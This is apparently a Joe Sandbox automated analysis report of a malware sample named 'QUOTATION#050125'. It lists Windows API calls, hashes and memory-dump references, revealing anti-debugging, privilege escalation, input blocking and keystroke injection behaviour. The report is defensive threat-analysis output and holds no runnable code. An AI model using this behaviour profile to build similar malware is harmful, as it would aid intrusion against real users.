• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 1904278450-0
• Opcode ID: c2235ffe8cdff44366b8681d5e4e3ac3b95a2be03963ab8625900bb55f7d4aa1
• Instruction ID: 60b8a71aa092daf4b1a40c9b633c957adf44d5ce45a93aff0c6c1180416903d2
• Opcode Fuzzy Hash: c2235ffe8cdff44366b8681d5e4e3ac3b95a2be03963ab8625900bb55f7d4aa1
• Instruction Fuzzy Hash: 3CC12A7190420DAFCB20EF69DC51ABE7BE9EF41310F24415AE650D7952E7709E41EF90
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00135CC1
• FindNextFileW.KERNEL32(00000000,?), ref: 00135D17
• FindClose.KERNEL32(?), ref: 00135D5F
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 4f09f6e2d1659b9dc48a536e5ab4853106427d38369eb1dc1f74c20be69ee89d
• Instruction ID: d6588f328656fa5a9ff5216632ccc0ed825dc2bc19ce010cfd1c18eca090a039
• Opcode Fuzzy Hash: 4f09f6e2d1659b9dc48a536e5ab4853106427d38369eb1dc1f74c20be69ee89d
• Instruction Fuzzy Hash: 19518874604B019FC718CF68C494E9AB7E5FF49324F14855EE99A8B3A2CB30ED45CB91
APIs
• IsDebuggerPresent.KERNEL32 ref: 000F271A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000F2724
• UnhandledExceptionFilter.KERNEL32(?), ref: 000F2731
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 2ed8c6f8099ee39833d07d86007028c6d7428354f2c686701a00e6e74d1fa1a6
• Instruction ID: 503d0e49cdbd4f5d9859389cdbedd17b651b57b5171377a6f43db7bef4a3651d
• Opcode Fuzzy Hash: 2ed8c6f8099ee39833d07d86007028c6d7428354f2c686701a00e6e74d1fa1a6
• Instruction Fuzzy Hash: 2F31B47491131CDBCB61EF65DC897D9B7B8AF18310F5041EAE41CA6261E7709F818F45
APIs
• SetErrorMode.KERNEL32(00000001), ref: 001351DA
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00135238
• SetErrorMode.KERNEL32(00000000), ref: 001352A1
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
• Opcode ID: a8780a57debadbba4af31378951155e5a176dba3d900d20c5deed2668e0a30b7
• Instruction ID: da583d01b93b81c1d22b092f28e4ab961b2920ed3efca2804f5f2d6a22019db5
• Opcode Fuzzy Hash: a8780a57debadbba4af31378951155e5a176dba3d900d20c5deed2668e0a30b7
• Instruction Fuzzy Hash: B6312F75A00618DFDB00DF54D884FAEBBB5FF49314F448099E8099B352DB71E856CB90
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0012170D
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0012173A
• GetLastError.KERNEL32 ref: 0012174A
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 4244140340-0
• Opcode ID: 52ba3a08c991e767019e25994730ab2c6d764abcb9f1367d7babd09cc3bc4253
• Instruction ID: dd6456e5fb9edd36784c2567934c126a314c7690a2b819000fe6adbe30d57025
• Opcode Fuzzy Hash: 52ba3a08c991e767019e25994730ab2c6d764abcb9f1367d7babd09cc3bc4253
• Instruction Fuzzy Hash: 4F1191B2404305BFD718DF54EC86DABB7BAEB44725B20852EF05657641EB70BC51CA60
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0012D608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0012D645
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0012D650
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
• Opcode ID: dc30ee7cee2f6e1cc73734792fcc4bf832d1de54d8b1fc552a12676bb6fb3753
• Instruction ID: 175c35e730bdfe0af6229cc78e2c436d0b275f9c6f266c8003388e706aa71db5
• Opcode Fuzzy Hash: dc30ee7cee2f6e1cc73734792fcc4bf832d1de54d8b1fc552a12676bb6fb3753
• Instruction Fuzzy Hash: D4112A75A05328BFDB108F95EC45BAFBBBCEB45B50F108115F914A7290D6704A058BE1
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0012168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001216A1
• FreeSid.ADVAPI32(?), ref: 001216B1
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: 76124bd3b3aa1ffe34d436ba771debc7ec2139a71cf29ea34f3be660b1919f2e
• Instruction ID: 9755391efd243871cd512cf0776f58ce490adcc57a80c436b7057bc31fb146d8
• Opcode Fuzzy Hash: 76124bd3b3aa1ffe34d436ba771debc7ec2139a71cf29ea34f3be660b1919f2e
• Instruction Fuzzy Hash: F1F0F475950309FFDB00DFE49C89AAEBBBCFB08605F504565E501E6181E774AA848A90
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(000F28E9,?,000E4CBE,000F28E9,001888B8,0000000C,000E4E15,000F28E9,00000002,00000000,?,000F28E9), ref: 000E4D09
                                                                                      • TerminateProcess.KERNEL32(00000000,?,000E4CBE,000F28E9,001888B8,0000000C,000E4E15,000F28E9,00000002,00000000,?,000F28E9), ref: 000E4D10
                                                                                      • ExitProcess.KERNEL32 ref: 000E4D22
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 66f8686cbf4736b9a9c41be0c083c6917ea6fb9b471e8d7654a85c7517337271
                                                                                      • Instruction ID: 7de24a0c3dc984b89390039695ef4fcf811715bcdd8066b4b8912559b1620468
                                                                                      • Opcode Fuzzy Hash: 66f8686cbf4736b9a9c41be0c083c6917ea6fb9b471e8d7654a85c7517337271
                                                                                      • Instruction Fuzzy Hash: B2E0B631005788EFCF51AF55DD09A983F69FF81792B108054FD05DA623CB35DD82DA80
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: /
                                                                                      • API String ID: 0-2043925204
                                                                                      • Opcode ID: 802ca95a89219b985e151c83d86cb958af4139782ae3e3e79329b41b65edd8dc
                                                                                      • Instruction ID: 692e0714861022b332f7e76f77586b75620ec189908a145ad9b7799e53fc9a7a
                                                                                      • Opcode Fuzzy Hash: 802ca95a89219b985e151c83d86cb958af4139782ae3e3e79329b41b65edd8dc
                                                                                      • Instruction Fuzzy Hash: 3B415B7290021DAFDB209FB9CD4ADBB77B8EBC4354F104269FA05D7581E6709E80DB50
                                                                                      APIs
                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0011D28C
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: NameUser
                                                                                      • String ID: X64
                                                                                      • API String ID: 2645101109-893830106
                                                                                      • Opcode ID: b3f74d578713cff5cf66f419bd28fa7afd30c0439f0c257ef254a4031173e3f2
                                                                                      • Instruction ID: 10607fe7b41f377026fca243f8ce891669d7aba2b04a70328e63fd852b3f4a07
                                                                                      • Opcode Fuzzy Hash: b3f74d578713cff5cf66f419bd28fa7afd30c0439f0c257ef254a4031173e3f2
                                                                                      • Instruction Fuzzy Hash: AFD0C9B480121DEECF94CB90EC88DDDB7BCBB04305F100152F106A2140D77495888F20
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00136918
                                                                                      • FindClose.KERNEL32(00000000), ref: 00136961
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: f30a49bae1391b7428c09ebe100717a7bcd02561846f0dc9fa7134befb3349fd
                                                                                      • Instruction ID: 703e1f863f072150b11493b37a1c503e39af75cc562169807cc7e8405bd257ce
                                                                                      • Opcode Fuzzy Hash: f30a49bae1391b7428c09ebe100717a7bcd02561846f0dc9fa7134befb3349fd
                                                                                      • Instruction Fuzzy Hash: 02117C31604600AFD710DF29D484F1ABBE5EF85329F15C6ADE4699F6A2C730EC46CB91
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00144891,?,?,00000035,?), ref: 001337E4
                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00144891,?,?,00000035,?), ref: 001337F4
                                                                                      Similarity
                                                                                      • API ID: ErrorFormatLastMessage
                                                                                      • String ID:
                                                                                      • API String ID: 3479602957-0
                                                                                      • Opcode ID: 33706c063f0ec429bed9d9da7adf4fb2aaac7fc2035214f4b8ead52e42825a9d
                                                                                      • Instruction ID: bdd302aa19936d476591579ccafcd3cbe5b466602637b4926f352a6ce12977cd
                                                                                      • Opcode Fuzzy Hash: 33706c063f0ec429bed9d9da7adf4fb2aaac7fc2035214f4b8ead52e42825a9d
                                                                                      • Instruction Fuzzy Hash: 13F0E5B06043296AE72017668C4DFEB3AAEEFC4761F000165F519D2691DA609944C7F0
                                                                                      APIs
                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0012B25D
                                                                                      • keybd_event.USER32(?,753CA2E0,?,00000000), ref: 0012B270
                                                                                      Similarity
                                                                                      • API ID: InputSendkeybd_event
                                                                                      • String ID:
                                                                                      • API String ID: 3536248340-0
                                                                                      • Opcode ID: 6c1696db836a9d3458c763f15b59b799c60b0132ef55df125931a3a6008623c0
                                                                                      • Instruction ID: 4c2b865533df043d283452ff297b6f8029bb191b6ab6b04389a22c32e88b160b
                                                                                      • Opcode Fuzzy Hash: 6c1696db836a9d3458c763f15b59b799c60b0132ef55df125931a3a6008623c0
                                                                                      • Instruction Fuzzy Hash: 87F01D7190438EEFDB059FA0D805BAE7FB4FF08305F008009F965A9192D3799651DF94
                                                                                      APIs
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001211FC), ref: 001210D4
                                                                                      • CloseHandle.KERNEL32(?,?,001211FC), ref: 001210E9
                                                                                      Similarity
                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                      • String ID:
                                                                                      • API String ID: 81990902-0
                                                                                      • Opcode ID: 14e24295da903e25264e947d9fbcd1b0a1a9b891140926cf8d8a291e21e817d1
                                                                                      • Instruction ID: dceaa8d01bf5b5fc6d5ed2aa3b99623eb69282d3441e4142f1ed522b2b7e2c56
                                                                                      • Opcode Fuzzy Hash: 14e24295da903e25264e947d9fbcd1b0a1a9b891140926cf8d8a291e21e817d1
                                                                                      • Instruction Fuzzy Hash: 64E04F32004711EEE7252B51FC05EB377A9EB04311B10C82EF4A6844B2DB626CE0DB60
                                                                                      Strings
                                                                                      • Variable is not of type 'Object'., xrefs: 00110C40
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Variable is not of type 'Object'.
                                                                                      • API String ID: 0-1840281001
                                                                                      • Opcode ID: 86d6967650c4b7db7ad7b5b96579cceea3e2f906b9cf75875484bd49600db274
                                                                                      • Instruction ID: 9979707c0b50a7abf1641d50c85473d600861e4d040bd5c92c532e790d046c47
                                                                                      • Opcode Fuzzy Hash: 86d6967650c4b7db7ad7b5b96579cceea3e2f906b9cf75875484bd49600db274
                                                                                      • Instruction Fuzzy Hash: 66327E74900218DBEF18DF94D881FEDB7B5BF09304F14406DE80AAB292D775AE86CB61
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000F6766,?,?,00000008,?,?,000FFEFE,00000000), ref: 000F6998
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 3d38beff9b730ad736290ed9ddfe32c8526d361d6fc7438ce93ee7d1cde36725
                                                                                      • Instruction ID: 895153ecf58358ce0267c247208f493558a8d0cf2063f83394a9e3ce3737edc8
                                                                                      • Opcode Fuzzy Hash: 3d38beff9b730ad736290ed9ddfe32c8526d361d6fc7438ce93ee7d1cde36725
                                                                                      • Instruction Fuzzy Hash: BEB16C31610608DFD755CF28C486B647BE0FF45364F29865CE99ACF6A2C736E982DB40
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 2df3c592bf445074fe3cd051023d91f9f603b7fd656f093ed65bd13792bc200a
                                                                                      • Instruction ID: e4f8145430d1d2876609337952a3140a967ae97fae00ba0bd1c44ae1e3f2fbc7
                                                                                      • Opcode Fuzzy Hash: 2df3c592bf445074fe3cd051023d91f9f603b7fd656f093ed65bd13792bc200a
                                                                                      • Instruction Fuzzy Hash: F7124175900229DBDB64CF58C881AEEB7F5FF48710F15816AE849EB255DB309E81CBA0
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000E06B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 2325560087-0
                                                                                      • Opcode ID: e4d6c73bbcfff00600f85d13d7b71a69ec4a76f49895e41d0f385524dadacb58
                                                                                      • Instruction ID: 8f48c1301ac603d769507b2cc7798dd6a2e1175504d1d494e2ec0bd4355f66c7
                                                                                      • Opcode Fuzzy Hash: e4d6c73bbcfff00600f85d13d7b71a69ec4a76f49895e41d0f385524dadacb58
                                                                                      • Instruction Fuzzy Hash: AB41AE71D05245CFEB59CF9AE9C569ABBF4FF48310F24806AD445EB660D3B4A980CFA0
                                                                                      APIs
                                                                                      • BlockInput.USER32(00000001), ref: 0013EABD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockInput
                                                                                      • String ID:
                                                                                      • API String ID: 3456056419-0
                                                                                      • Opcode ID: b6061960566172e262e5adcca9175863928d346bfde5d985963917e142937582
                                                                                      • Instruction ID: 1dd19c41904bc87e2d50f6432a8098db728ad200409080f89841ac4314d389d7
                                                                                      • Opcode Fuzzy Hash: b6061960566172e262e5adcca9175863928d346bfde5d985963917e142937582
                                                                                      • Instruction Fuzzy Hash: B2E04F312003059FD710EF59D805E9AF7E9AF98760F00842AFC49CB391DB70E8418B90
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,000E03EE), ref: 000E09DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: 03391f66fb04785be65405be740459772f58e877bccce36d50f0432b68ca1e3a
                                                                                      • Instruction ID: dcf4ef48895afd9597ad5215be1ea7a8f1ab6bdb81cc765ab5c9fb2bc9d243ec
                                                                                      • Opcode Fuzzy Hash: 03391f66fb04785be65405be740459772f58e877bccce36d50f0432b68ca1e3a
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction ID: 09da0e2873799e4f8b458868389a39aa8fd1336a06e8cfb83cf2f498919d77fb
                                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction Fuzzy Hash: 2451977168C6C55FDBB8856B8A597FE23C99F62300F18051AD98EF7283CE11DE01D352
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ed164f075aef45cbf62344498d9acb0b56fd6f53942877fa71c08462a0db5d79
                                                                                      • Instruction ID: 83e1b719a77c3f9e1b37c8abd5cf33fa2eed58322d96203af69dad9430a4ed7f
                                                                                      • Opcode Fuzzy Hash: ed164f075aef45cbf62344498d9acb0b56fd6f53942877fa71c08462a0db5d79
                                                                                      • Instruction Fuzzy Hash: C2323222D29F054DD7639634CC22336A289AFB73C5F15C737E81AB5EAAEB69C4C35101
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a1daeb65b9b887988e0d5492a9fe2890e00cdc49ec5d53346e7f0deafe4ef91a
                                                                                      • Instruction ID: 9ec4cc2e1abdf30387b77ddf22867a9f6e50c9886598dcb02bb9aeeaa7b6b11a
                                                                                      • Opcode Fuzzy Hash: a1daeb65b9b887988e0d5492a9fe2890e00cdc49ec5d53346e7f0deafe4ef91a
                                                                                      • Instruction Fuzzy Hash: B5320131A842168BDF2CCA28C594AFD7BA1AF45300F29817BD95A8B791E330DDC1DBD1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e832914a039e9aeb600e7a4831baffa648c4f371ec2c16298d8d72a88f788b04
                                                                                      • Instruction ID: 3c31fdb879a3ca499b5864be6133bd625d96bae0837d560d6aa964c72ef2455d
                                                                                      • Opcode Fuzzy Hash: e832914a039e9aeb600e7a4831baffa648c4f371ec2c16298d8d72a88f788b04
                                                                                      • Instruction Fuzzy Hash: 41227D70A0460A9FDF14CFA4C881BEEB7B6FF44300F144529E856AB291EB76AE55CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7542d374735e27f5c44f18d7c87699b1b05263207d29ad02df89eb21efcc039
                                                                                      • Instruction ID: 527bba27562e6b7fee4cf4fab65104abc428ae5ca697ed64da699e87014f551e
                                                                                      • Opcode Fuzzy Hash: a7542d374735e27f5c44f18d7c87699b1b05263207d29ad02df89eb21efcc039
                                                                                      • Instruction Fuzzy Hash: 0E02C5B0A0020AEBDB04DF55D981BAEB7F5FF44300F118569E8569B3D1EB71EA60CB91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
